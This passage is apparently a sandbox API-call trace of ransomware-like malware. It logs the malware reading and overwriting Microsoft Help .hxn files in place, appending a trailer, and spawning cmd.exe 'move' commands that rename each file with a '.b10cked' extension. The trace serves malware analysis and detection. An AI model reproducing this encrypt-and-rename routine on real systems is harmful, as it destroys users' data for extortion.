hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x146 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.283] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.283] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.284] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.285] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.285] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.285] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.285] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0197.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.EXCEL.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0197.289] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x146 [0197.289] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.289] CloseHandle (hObject=0x120) returned 1 [0197.290] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN") returned 0x27 [0197.290] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.291] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xbb4, dwThreadId=0xcbc)) returned 1 [0197.292] CloseHandle (hObject=0x1b4) returned 1 [0197.292] CloseHandle (hObject=0x120) returned 1 [0197.292] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.292] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.292] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.292] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.292] ReleaseMutex (hMutex=0xf8) returned 1 [0197.292] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.292] ReleaseMutex (hMutex=0xf8) returned 1 [0197.292] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.292] ReleaseMutex (hMutex=0xf8) returned 1 [0197.292] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.292] ReleaseMutex (hMutex=0xf8) returned 1 [0197.292] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25408193390) returned 1 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x15e [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x15e [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x15e [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.294] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0197.295] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.295] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0197.295] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0197.296] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0197.296] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0197.296] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0197.300] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0197.300] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x132f75c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.EXCEL.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0197.300] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x15e [0197.300] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.300] CloseHandle (hObject=0x120) returned 1 [0197.301] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN") returned 0x27 [0197.302] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.302] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x6d8, dwThreadId=0xbcc)) returned 1 [0197.304] CloseHandle (hObject=0x1b4) returned 1 [0197.304] CloseHandle (hObject=0x120) returned 1 [0197.304] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.304] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.304] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.304] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.304] ReleaseMutex (hMutex=0xf8) returned 1 [0197.304] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.304] ReleaseMutex (hMutex=0xf8) returned 1 [0197.304] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.304] ReleaseMutex (hMutex=0xf8) returned 1 [0197.304] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.304] ReleaseMutex (hMutex=0xf8) returned 1 [0197.304] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.305] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25409414155) returned 1 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x146 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x146 [0197.307] SetFilePointer (in: 